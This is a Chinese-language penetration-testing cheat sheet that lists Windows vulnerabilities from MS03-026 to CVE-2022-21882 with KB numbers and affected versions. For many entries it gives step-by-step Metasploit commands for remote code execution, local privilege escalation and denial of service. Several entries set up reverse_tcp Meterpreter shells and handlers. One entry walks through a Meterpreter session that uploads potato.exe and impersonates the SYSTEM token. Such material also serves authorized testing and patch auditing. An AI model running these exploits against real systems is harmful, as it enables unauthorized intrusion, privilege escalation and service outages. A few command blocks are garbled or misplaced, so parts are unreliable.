ms03-026 [KB823980]
影响版本
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2003
- Microsoft Windows 2000SP3
- Microsoft Windows 2000SP2
- Microsoft Windows 2000SP1
- Microsoft Windows 2000
msf利用
msf > search ms03_026
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST <target ip>
msf exploit(ms03_026_dcom) > set LHOST <local ip>
msf exploit(ms03_026_dcom) > exploit
MS05-039 [KB899588]
影响版本
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows Server 2003 Service Pack 1(用于基于 Itanium 的系统)
- Microsoft Windows Server 2003 x64 Edition
msf利用
use exploit/windows/smb/ms05_039_pnp
set RHOST <target ip>
set LHOST <local ip>
exploit
MS06-040 [KB921883]
影响版本
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003 和 Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003(用于基于 Itanium 的系统)和 Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)
- Microsoft Windows Server 2003 x64 Edition
msf利用
use exploit/windows/smb/ms06_040_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit
MS08-025 [KB941693]
影响版本
- Microsoft Windows 2000 Service Pack 4
- Windows XP Service Pack 2
- Windows 2003
MS08-066 [KB956803]
影响版本
- windows xp
- windows 2003
MS08-067 [KB958644]
影响版本
- windows 2000
- windows xp
- windows 2003
- windows 2008
- windows7
msf
use exploit/windows/smb/ms08_067_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit
MS08-068 [KB957097]
影响版本
- Windows2000
- windowsxp
- windows2003
- Windows Vista
- windows 2008
msf
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
...targets...
msf exploit(smb_relay) > set TARGET <target-id>
msf exploit(smb_relay) > show options
...show and set options...
msf exploit(smb_relay) > exploit
MS09-012 (巴西烤肉)(pr) [KB959454]
影响版本
- win2000
- winxp
- win2003
- winvista
- win2008
MS09-020 [KB970483]
影响版本
- win2000
- winxp
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 SP2(用于基于 Itanium 的系统)
MS09-050 [KB975517]
影响版本
- win2008
- win Vista
msf
msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost <local ip>
msf exploit(ms09_050_smb2_negotiate_func_index) > run
MS10-012 [KB971468]
影响版本
- win7
- win2008
- win vista
MS10-015 [KB977165]
影响版本
- win2003
- win2008
- win7
- winxp
msf
msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > show targets
...targets...
msf exploit(ms10_015_kitrap0d) > set TARGET <target-id>
msf exploit(ms10_015_kitrap0d) > show options
...show and set options...
msf exploit(ms10_015_kitrap0d) > exploit
MS10-048 [KB2160329]
影响版本
- winxp
- win2003
- win2008
- win7
- win2008
MS10-059 [KB982799]
影响版本
- win2008
- win7
- win Vista
MS10-065 [KB2267960]
影响版本
- IIS 5.1、6.0、7.0 和 7.5(fastcgi)
msf
msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
msf auxiliary(ms10_065_ii6_asp_dos) > show actions
...actions...
msf auxiliary(ms10_065_ii6_asp_dos) > set ACTION <action-name>
msf auxiliary(ms10_065_ii6_asp_dos) > show options
...show and set options...
msf auxiliary(ms10_065_ii6_asp_dos) > run
MS10-092 [KB2305420]
影响版本
- win2008
- win7
msf
msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(ms10_092_schelevator) > show targets
...targets...
msf exploit(ms10_092_schelevator) > set TARGET <target-id>
msf exploit(ms10_092_schelevator) > show options
...show and set options...
msf exploit(ms10_092_schelevator) > exploit
MS11-011 [KB2393802]
影响版本
- win2003
- win2008
- win7
- winxp
- winvista
MS11-046 [KB2503665]
影响版本
- win2003
- win2008
- win7
- winxp
MS11-062 [KB2566454]
影响版本
- win2003
- winxp
MS11-080 [KB2592799]
影响版本
- win2003
- winxp
msf
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit
MS12-020 [KB2671387]
影响版本
- win2003
- win2008
- winxp
- win7
msf
msf > search ms12_020
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST <ip>
msf auxiliary(ms12_020_maxchannelids) > run
MS12-042 [KB2972621]
影响版本
- win2003
- win7
MS13-005 [KB2778930]
影响版本
- win2003
- win2008
- win2012
- win7
- win8
msf
msf > use exploit/windows/local/ms13_005_hwnd_broadcast
msf exploit(ms13_005_hwnd_broadcast) > show targets
...targets...
msf exploit(ms13_005_hwnd_broadcast) > set TARGET <target-id>
msf exploit(ms13_005_hwnd_broadcast) > show options
...show and set options...
msf exploit(ms13_005_hwnd_broadcast) > exploit
MS13-046 [KB2840221]
影响版本
- winxp
- win2003
- Windows Vista
- win2008
- win2012
- win7
- win8
MS13-053 [KB2850851]
影响版本
- Windows Vista
- winxp
- win2003
- win2008
- win2012
- win7
- win8
msf
msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > show targets
...targets...
msf exploit(ms13_053_schlamperei) > set TARGET <target-id>
msf exploit(ms13_053_schlamperei) > show options
...show and set options...
msf exploit(ms13_053_schlamperei) > exploit
MS14-002 [KB2914368]
影响版本
- winxp
- win2003
msf
msf > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > show targets
...targets...
msf exploit(ms_ndproxy) > set TARGET <target-id>
msf exploit(ms_ndproxy) > show options
...show and set options...
msf exploit(ms_ndproxy) > exploit
MS14-040 [KB2975684]
影响版本
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS14-058 [KB3000061]
影响版本
- win2003
msf
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > show targets
...targets...
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > show options
...show and set options...
msf exploit(ms14_058_track_popup_menu) > exploit
MS14-066 [KB2992611]
影响版本
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS14-068 [KB3011780]
影响版本
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS14-070 [KB2989935]
影响版本
- win2003
MS15-001 [KB3023266]
影响版本
- win7
- win8
- win8.1
MS15-010 [KB3036220]
影响版本
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS15-015 [KB3031432]
影响版本
- win7
- win8
- win8.1
MS15-051 [KB3057191]
影响版本
- win2003
- win2008
- win2012
- win7
- win8
msf
msf > use exploit/windows/local/ms15_051_client_copy_image
msf exploit(ms15_051_client_copy_image) > show targets
...targets...
msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
msf exploit(ms15_051_client_copy_image) > show options
...show and set options...
msf exploit(ms15_051_client_copy_image) > exploit
MS15-061 [KB3057839]
影响版本
- win2003
- win2008
- win2012
- win7
- win8
MS15-076 [KB3067505]
影响版本
- win2003
- win2008
- win2012
- win7
- win8
MS15-077 [KB3077657]
影响版本
- win2003
- win2008
- win2012
- win7
- win8
MS15-097 [KB3089656]
影响版本
- Windows Vista
- win2008
- win2012
- win7
- win8
- win8.1
MS16-014 [K3134228]
影响版本
- Windows Vista Service Pack 2
- Windows Server 2008
- Windows 7
- Windows Server 2008 R2(用于基于 x64 的系统
- Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1
MS16-016 [KB3136041]
影响版本
- win2008
- win7
- winvista
msf
msf > use exploit/windows/local/ms16_016_webdav
MS16-032 [KB3143141]
影响版本
- win2008
- win2012
- win7
- win8
- win10
msf
msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
...targets...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
...show and set options...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit
MS16-034 [KB3143145]
影响版本
- win2008
- win2012
- win7
- win8
- win10
MS16-075 (烂土豆) [KB3164038]
影响版本
- in2008
- win2012
- win7
- win8
- win10
msf
msf exploit(web_delivery) > set ExitOnsession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
SeAssignPrimaryTokenPrivilege
meterpreter > upload /root/potato.exe C:\Users\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
MS16-098 [KB3178466]
影响版本
- win8.1
MS16-111 [KB3186973]
影响版本
- win10-1703以下
- win8
- win2003
- win2008
- win2012
MS16-135 [KB3199135]
影响版本
- win7
- win2008Service Pack 1
- win8.1
- win10-1607
MS17-010 [KB4013389]
影响版本
- win7
- win2008
- winxp
ms17-017 [KB4013081]
影响版本
- Microsoft Windows Vista
- Microsoft Windows Server 2008
- Microsoft Windows 7
CVE-2017-0213
影响版本
- Windows10,包括1511、1607、1703这三个版本
- Windows 7 SP1
- Windows 8.1、RT8.1
- Windows Server 2008 SP2、2008R2 SP1
- Windows Server 2012、2012R2
- CVE-2018-8440
- Windows Server 2016
CVE-2017-8464 [KB4024402][KB4022722]
影响版本
- Windows 10
- Windows 7
- Windows 8.1
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2008 R2
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
msf
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set lhost <local-ip>
msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
msf exploit(cve_2017_8464_lnk_rce) > run
msf exploit(ms10_092_schelevator) > exploit
msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <local-ip>
msf exploit(handler) > set lport 8988
msf exploit(handler) > run
CVE-2018-8120
影响版本
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for Itanium-Based Systems ServicePack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1
- Windows Server 2008 R2 for x64-based Systems ServicePack 1
- Windows Server 2008 R2 for x64-based Systems ServicePack 1
msf
use exploit/windows/local/ms18_8120_win32k_privesc
CVE-2018-1038 [KB4088878][KB4074587][KB4056897]
影响版本
- Windows 7 SP1
- Windows Server 2008 R2 SP1
CVE-2018-8639 [KB4100480]
影响版本
- Windows 7
- Windows Server 2012 R2
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2019
- Windows Server 2012
- Windows 8.1
- Windows Server 2016
- Windows Server 2008 R2
- Windows 10 1607、1703、1709、1803、1809
CVE-2019-0803 [kb44934**]
影响版本
- Microsoft Windows Server 2019 0
- Microsoft Windows Server 2016 0
- Microsoft Windows Server 2012 R2 0
- Microsoft Windows Server 2012 0
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 1803 0
- Microsoft Windows Server 1709 0
- Microsoft Windows RT 8.1
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows 8.1 for 32-bit Systems 0
- Microsoft Windows 7 for x64-based Systems S1
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 10 Version 1809 for x64-based Systems 0
- Microsoft Windows 10 Version 1809 for ARM64-based Systems 0
- Microsoft Windows 10 Version 1809 for 32-bit Systems 0
- Microsoft Windows 10 Version 1803 for x64-based Systems 0
- Microsoft Windows 10 Version 1803 for ARM64-based Systems 0
- Microsoft Windows 10 Version 1803 for 32-bit Systems 0
- Microsoft Windows 10 version 1709 for x64-based Systems 0
- Microsoft Windows 10 Version 1709 for ARM64-based Systems 0
- Microsoft Windows 10 version 1709 for 32-bit Systems 0
- Microsoft Windows 10 version 1703 for x64-based Systems 0
- Microsoft Windows 10 version 1703 for 32-bit Systems 0
- Microsoft Windows 10 Version 1607 for x64-based Systems 0
- Microsoft Windows 10 Version 1607 for 32-bit Systems 0
- Microsoft Windows 10 for x64-based Systems 0
- Microsoft Windows 10 for 32-bit Systems
CVE-2019-1388[KB4525235][KB4525233]
影响版本
- Microsoft Windows Server 2019
- Microsoft Windows Server 2016
- Microsoft Windows Server 2012
- Microsoft Windows Server 2008 R2
- Microsoft Windows Server 2008
- Microsoft Windows RT 8.1
- Microsoft Windows 8.1
- Microsoft Windows 7
CVE-2019-1458
影响版本
- Microsoft Windows 10 Version 1607 for 32-bit Systems
- Microsoft Windows 10 Version 1607 for x64-based Systems
- Microsoft Windows 10 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows RT 8.1
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2016
CVE-2020-0796 [KB4551762]
影响版本
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows Server, Version 1903 (Server Core installation)
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows Server, Version 1909 (Server Core installation)
CVE-2021-1732 [4601345][4601349]
影响版本
- Windows Server, version 20H2 (Server Core Installation)
- Windows 10 Version 20H2 for ARM64based Systems
- Windows 10 Version 20H2 for 32bit Systems
- Windows 10 Version 20H2 for x64based Systems
- Windows Server, version 2004 (Server Core installation)
- Windows 10 Version 2004 for x64based Systems
- Windows 10 Version 2004 for ARM64based Systems
- Windows 10 Version 2004 for 32bit Systems
- Windows Server, version 1909 (Server Core installation)
- Windows 10 Version 1909 for ARM64based Systems
- Windows 10 Version 1909 for x64based Systems
- Windows 10 Version 1909 for 32bit Systems
- Windows Server 2019 (Server Core installation)
- Windows Server 2019
- Windows 10 Version 1809 for ARM64based Systems
- Windows 10 Version 1809 for x64based Systems
- Windows 10 Version 1809 for 32bit Systems
- Windows 10 Version 1803 for ARM64based Systems
- Windows 10 Version 1803 for x64based Systems
CVE-2021-33739[5003637]
影响版本
- Windows 10
CVE-2021-40449[,5006714,5006729,5006739,5006732,5006743,5006728,5006736,5006715,5006670,5006675,5006667,5006672]
影响版本
- windows 10
域提权,CVE-2021-42287[KB5008602]
- Windows Server 2012 R2 (Server Core installation)
- Windows Server 2012 R2
- Windows Server 2012 (Server Core installation)
- Windows Server 2012
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2016 (Server Core installation)
- Windows Server 2016
- Windows Server, version 20H2 (Server Core Installation)
- Windows Server, version 2004 (Server Core installation)
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows Server 2019 (Server Core installation)
域提权,CVE-2021-42278[KB5008380]
影响版本
- Windows Server 2012 R2 (Server Core installation)
- Windows Server 2012 R2
- Windows Server 2012 (Server Core installation)
- Windows Server 2012
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2016 (Server Core installation)
- Windows Server 2016
- Windows Server, version 20H2 (Server Core Installation)
- Windows Server, version 2004 (Server Core installation)
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows Server 2019 (Server Core
CVE-2022-21882[5009566,5009543,5009545]
影响版本
- Windows 10 Version 1809/1909/2004/20H2/21H1/21H2 for 32/64-bit Systems
- Windows Server, version 20H2 (Server Core Installation)
- Windows 11 for ARM64/x64-based Systems
- Windows Server 2019/2022